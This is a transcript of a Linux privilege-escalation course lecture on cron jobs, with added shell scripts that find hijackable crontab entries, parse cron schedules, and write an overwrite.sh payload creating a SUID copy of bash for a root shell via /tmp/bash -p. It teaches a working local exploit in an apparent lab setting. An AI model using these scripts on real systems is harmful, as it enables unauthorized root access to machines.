Linux Privilege Escalation
This course explores how to carry out privilege escalation on Linux machines. We look at enumeration, kernel exploits, sudo list, suid, crontab, and much more!
Hi. In this lecture we're going to take a deeper look at cron jobs, which we have actually covered before. In Bandit we saw a lot of cron jobs and exploited them to get to the next level, in other words to escalate our privileges. That's exactly what we're going to do in these lectures, but we're also going to go into the theory behind cron jobs, so that you understand them well enough to use them in upcoming CTFs or in penetration tests during your career. So, let me locate cron.d first. If I try to cat /etc/cron.d, it says it's a directory, so let me ls into it instead. Apparently there's nothing there; ls -la shows only a hidden placeholder file. So I don't think we have anything in cron.d, but that's not the only place we should look. We also have to look at the crontab.
So, if you cat /etc/crontab, you can see the cron jobs that reside on the system, in a more detailed view like this. And remember what a cron job is: a command that the cron service runs in the background on a schedule, so we can make it run at whatever time we want. At the top we see the SHELL and PATH variables the jobs use; keep that PATH in mind, it matters in a minute. Below that, each line is an individual cron job. We'll talk about what the stars mean shortly; the last column is the command that runs. Here we see some cd commands followed by run-parts on /etc/cron.daily, cron.weekly and cron.monthly. Those directories don't have to be named daily, weekly and monthly, by the way; the schedule fields tell us when a job actually runs, and we'll go into that. Then there are two more jobs: one runs overwrite.sh and the other runs compress.sh. So, the next thing we can do is see what overwrite.sh does. I cat it and it says no such file or directory, and note that the crontab runs it as root. We're in /home/user right now, and ls -la confirms it isn't there. The job is written as just overwrite.sh, with no path, so it doesn't have to be in /home/user; maybe it lives somewhere else on the PATH, like /usr/local/bin. For compress.sh, on the other hand, the crontab gives the whole path: /usr/local/bin/compress.sh.
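What the lecture does by eye here, checking where a bare command like overwrite.sh would be looked up and whether a script referenced by full path like /usr/local/bin/compress.sh can be overwritten, can be scripted. The following is an added example, not code from the course: it reads the PATH line that cron itself will use, then reports every bare command for which a directory we can write to comes before the command's real location, plus every script referenced by path that we can write to. The crontab it runs against is constructed inline in a scratch directory to mirror the one on screen, and the function names are my own. The @reboot/@daily shorthand forms are not parsed.

```shell
#!/bin/sh
# Added example (not the course's code): find cron jobs we could hijack.
#  - HIJACK  : a bare command name whose lookup walks the crontab's own PATH and
#              hits a directory we can write to before reaching the real binary
#  - WRITABLE: a script referenced by path that we can overwrite directly

# Print the PATH declared in the crontab (the last PATH= line wins). cron does
# not use the calling user's PATH; it uses this one, or a small built-in default.
crontab_path() {
    p=$(grep -E '^[[:space:]]*PATH[[:space:]]*=' "$1" | tail -n 1 |
        sed -E 's/^[[:space:]]*PATH[[:space:]]*=[[:space:]]*//; s/^"//; s/"$//')
    printf '%s\n' "${p:-/usr/bin:/bin}"
}

# Resolve a bare command the way cron's shell will: walk PATH left to right.
# Print the first directory we can write to that comes before the one holding
# the real command (or anywhere in PATH, if the command exists nowhere); print
# nothing if the real command is reached first.
hijack_dir() (
    set -f
    path="$1" cmd="$2"
    IFS=':'
    for d in $path; do
        [ -z "$d" ] && d="."                 # an empty PATH entry means the cwd
        [ -x "$d/$cmd" ] && exit 0           # real command found first: nothing to plant
        if [ -d "$d" ] && [ -w "$d" ]; then
            printf '%s\n' "$d"
            exit 0
        fi
    done
    exit 0
)

# Scan a system crontab (min hour dom mon dow user command ...) and print one
# finding per line: "HIJACK <command> <dir>" or "WRITABLE <script>".
cron_findings() {
    path=$(crontab_path "$1")
    while read -r f1 f2 f3 f4 f5 user cmd rest; do
        case "$f1" in ''|'#'*|*=*) continue ;; esac    # blank, comment, NAME=value
        [ "$f2" = "=" ] && continue                    # NAME = value
        [ -n "$cmd" ] || continue
        case "$cmd" in
            */*) if [ -w "$cmd" ]; then printf 'WRITABLE %s\n' "$cmd"; fi ;;
            *)   d=$(hijack_dir "$path" "$cmd")
                 if [ -n "$d" ]; then printf 'HIJACK %s %s\n' "$cmd" "$d"; fi ;;
        esac
    done < "$1"
}

# Constructed demo modelled on the crontab in the lecture. A scratch tree stands
# in for / so that home/user is the first (and writable) PATH entry, overwrite.sh
# exists nowhere, and compress.sh exists and is writable by us.
demo() {
    root=$(mktemp -d)
    mkdir -p "$root/home/user" "$root/usr/local/bin"
    printf '#!/bin/sh\necho compressing\n' > "$root/usr/local/bin/compress.sh"
    chmod 755 "$root/usr/local/bin/compress.sh"
    cat > "$root/crontab" <<EOF
SHELL=/bin/sh
PATH=$root/home/user:$root/usr/local/sbin:$root/usr/local/bin:$root/usr/sbin:$root/usr/bin:$root/sbin:$root/bin

# m h dom mon dow user  command
* * * * * root overwrite.sh
* * * * * root $root/usr/local/bin/compress.sh
EOF
    cron_findings "$root/crontab"
    rm -rf "$root"
}

demo
```

Run against a real box with cron_findings /etc/crontab; a HIJACK line for a job that runs as root is exactly the lead the lecture follows, and a WRITABLE line means you can edit the script in place instead of planting a look-alike.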
So, I can cat that one and see what's inside. As you can see, this file really exists, so there's nothing wrong there. But overwrite.sh doesn't exist, or at least it isn't in /home/user. And that is a lead we can follow: the PATH line in /etc/crontab starts with /home/user, so when cron runs the bare command overwrite.sh it looks in /home/user first. If we create an overwrite.sh file in /home/user, cron will execute it as root. Then we need to understand when it's going to be executed, so that we can write a script that makes us root, or a reverse shell, and know how long to wait. It's good practice for us. But there is a lot of other information here that we haven't covered, and we should cover it in order to understand how cron jobs work. All those stars indicate when, or how often, a job runs: every minute, daily, weekly, monthly. To read them you have to read each line like a table. The first column is the minute (m), the second is the hour (h), then day of month (dom), month (mon) and day of week (dow). A star means every value of that field, so five stars means every minute. A specific number restricts that field, for example 17 in the minute column. We're going to go through this so you understand it well, and there's a very quick way to check yourself: search for crontab guru, crontab.guru. It's a website.
It's not the only website that does this, but it's a very good one; if it doesn't work for you, search for another. If you type the stars, or the numbers, into it, it tells you what they mean. Five stars means "At every minute", so overwrite.sh and compress.sh get executed every minute. If we put 17 in the first field instead, it says "At minute 17", which means at minute 17 of every hour (xx:17), not every 17 minutes.
If we write 25 in the minute field and 6 in the hour field, it says "At 06:25", so every day at 6:25. Let's try the other ones. Of course, every script here runs as root, which gives us some clues. Let's make it 47 for the minute, 6 for the hour, and 7 in the last field, the day of week. Now it says "At 06:47 on Sunday" (both 0 and 7 mean Sunday). A weird cron job, but that's how it gets executed: once a week, exactly at 6:47 on Sundays. If we change it to 52, 6, 1 and stars for the rest, it says "At 06:52 on day-of-month 1", so once a month. This is how you work out when a job runs, and it's very important: you may find a very good vulnerability, a script you can overwrite that gets executed as root, but if it doesn't run every minute or every day you might have to wait a month for that root shell, which isn't very practical. In this case we know overwrite.sh and compress.sh get executed every minute, so if we can overwrite them that's great; we only wait a minute and get our shell back.
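The matching rules crontab.guru applies can be written down in a few lines of shell, which is handy on a box with no internet access. This is an added example, not part of the course: cron_fires_at takes a five-field schedule and a time and says whether the job fires then. It handles *, numbers, lists, ranges and /step, treats 0 and 7 both as Sunday, and implements the rule from the cron(5) manual that when both day-of-month and day-of-week are restricted the job runs when either one matches. Month and weekday names (JAN, MON) are not supported. The function names and sample times are my own.

```shell
#!/bin/sh
# Added example (not the course's code): a matcher for the five schedule fields
# minute, hour, day-of-month, month, day-of-week, so you can tell offline
# whether a job in /etc/crontab fires at a given time.

# Does value $2 match field $1? $3 and $4 are the field's natural minimum and
# maximum (used by "*" and by the "/step" form). Exit 0 on match, 1 otherwise.
cron_field_matches() (
    set -f                               # the field may be "*": never let it glob
    field="$1" v="$2" fmin="$3" fmax="$4"
    IFS=','
    for item in $field; do               # a,b,c list: any element may match
        step=1
        case "$item" in */*) step=${item#*/}; item=${item%%/*} ;; esac
        case "$item" in
            '*') lo=$fmin; hi=$fmax ;;
            *-*) lo=${item%-*}; hi=${item#*-} ;;
            *)   lo=$item; hi=$item
                 if [ "$step" -ne 1 ]; then hi=$fmax; fi ;;   # "5/10" = 5,15,25,...
        esac
        if [ "$v" -ge "$lo" ] && [ "$v" -le "$hi" ] && [ $(( (v - lo) % step )) -eq 0 ]; then
            exit 0
        fi
    done
    exit 1
)

# Day-of-week, where both 0 and 7 mean Sunday, in the field and in the value.
cron_dow_matches() {
    dow="$2"
    if [ "$dow" -eq 7 ]; then dow=0; fi
    if cron_field_matches "$1" "$dow" 0 7; then return 0; fi
    if [ "$dow" -eq 0 ] && cron_field_matches "$1" 7 0 7; then return 0; fi
    return 1
}

# Does schedule "$1" (five fields) fire at minute $2, hour $3, day-of-month $4,
# month $5, weekday $6 (0-7)? Exit 0 if yes, 1 if no, 2 on a malformed spec.
cron_fires_at() (
    set -f
    m="$2" h="$3" dom="$4" mon="$5" dow="$6"
    set -- $1
    [ $# -eq 5 ] || { echo "malformed schedule: $*" >&2; exit 2; }
    cron_field_matches "$1" "$m" 0 59   || exit 1
    cron_field_matches "$2" "$h" 0 23   || exit 1
    cron_field_matches "$4" "$mon" 1 12 || exit 1
    # cron(5) rule: if day-of-month AND day-of-week are both restricted, the job
    # runs when EITHER matches ("0 0 13 * 5" = the 13th, and also every Friday).
    # Otherwise both must match, which is trivially true for the "*" side.
    if [ "$3" != '*' ] && [ "$5" != '*' ]; then
        cron_field_matches "$3" "$dom" 1 31 || cron_dow_matches "$5" "$dow"
    else
        cron_field_matches "$3" "$dom" 1 31 && cron_dow_matches "$5" "$dow"
    fi
)

# Constructed demo: the schedules from the lecture checked against 06:47 on
# Sunday 1 March (minute 47, hour 6, dom 1, month 3, dow 0).
demo() {
    for spec in "* * * * *" "17 * * * *" "25 6 * * *" "47 6 * * 7" "52 6 1 * *"; do
        if cron_fires_at "$spec" 47 6 1 3 0; then r=fires; else r=idle; fi
        printf '%-12s -> %s\n' "$spec" "$r"
    done
}

demo
```

The "17 * * * *" case is the one to remember: it is true at 06:17, 07:17 and so on, and false at 06:34, so a job with that schedule is worth at most an hour's wait, not seventeen minutes.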
So again, this is the crontab; don't forget to cat /etc/crontab when you're locating the cron jobs in your pentest. What I'm going to do, of course, is create overwrite.sh: I echo cp /bin/bash /tmp/bash, a semicolon, and then chmod +s /tmp/bash to give the copy the SUID bit (that works because the script runs as root), and redirect all of that into /home/user/overwrite.sh. So far so good; we've done this before. I'll also make the file executable with chmod +x. Since I created it as user, I can do that as user as well. Now, since the file is in /home/user, and /home/user is the first directory in the crontab's PATH, I can just wait a minute and become root, because the job runs every minute. Once it has run, /tmp/bash exists, so we run /tmp/bash -p. Make sure you put the -p there, like we've done before: without it bash drops the effective uid back to your own and you don't get root. Wait a minute and check: ls -la /tmp shows bash, so the copy happened, and that's how we know the job ran. If I run it, here you go, I get the shell, and whoami says root as usual. Great, let's stop here and continue in the next lecture.
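Here is the payload step from the lecture written as reusable shell, as an added example that is not the course's own code: write_payload produces an overwrite.sh that copies bash to a chosen path and sets the SUID bit on the copy, payload_status checks whether that copy exists with the SUID bit set (the test the lecture does by hand with ls -la /tmp), and wait_for_payload polls for it. The destination paths and the 70-second limit are parameters I chose; the demo stands in for cron itself in a scratch directory, so the copy it produces is owned by the current user rather than root.

```shell
#!/bin/sh
# Added example (not the course's code): the payload step, as functions.
#   write_payload    - drop an overwrite.sh that copies a shell and sets SUID on it
#   payload_status   - has cron fired it yet? (what the lecture checks with ls -la /tmp)
#   wait_for_payload - poll for that, since a "* * * * *" job fires once a minute
# Assumption: the paths passed in contain no spaces or shell metacharacters.

# Write the payload script. When cron runs it as root, the copy is root-owned
# with the set-uid bit, so running it with -p gives a root shell.
write_payload() {
    dest="$1" copy="$2" src="${3:-/bin/bash}"
    printf '#!/bin/sh\ncp %s %s && chmod u+s %s\n' "$src" "$copy" "$copy" > "$dest"
    chmod +x "$dest"     # we created the file as our own user, so we may do this
}

# Print "ran" if the copy exists with the set-uid bit, else "waiting".
payload_status() {
    if [ -f "$1" ] && [ -u "$1" ]; then echo ran; else echo waiting; fi
}

# Poll once a second for up to $2 seconds (default 70: long enough to cover the
# next minute boundary). Return 0 as soon as the copy appears, 1 on timeout.
wait_for_payload() {
    i=0
    while [ "$i" -lt "${2:-70}" ]; do
        if [ "$(payload_status "$1")" = ran ]; then return 0; fi
        sleep 1
        i=$((i + 1))
    done
    return 1
}

# Constructed demo. Against the lecture's box the real sequence is:
#   write_payload /home/user/overwrite.sh /tmp/bash
#   wait_for_payload /tmp/bash && /tmp/bash -p
# (-p keeps bash from dropping the effective uid back to ours.) Here we act as
# cron ourselves in a scratch directory, so the copy is owned by us, not root.
demo() {
    d=$(mktemp -d)
    write_payload "$d/overwrite.sh" "$d/bash" "$(command -v sh)"
    echo "before: $(payload_status "$d/bash")"
    sh "$d/overwrite.sh"                 # stand in for the cron run
    echo "after: $(payload_status "$d/bash")"
    ls -l "$d/bash"                      # mode shows rws..., the s is the set-uid bit
    rm -rf "$d"
}

demo
```

On the real target the check that matters is the owner column of ls -l /tmp/bash: a set-uid copy owned by your own user (as in the demo) gives you nothing, a set-uid copy owned by root is the job done.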
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.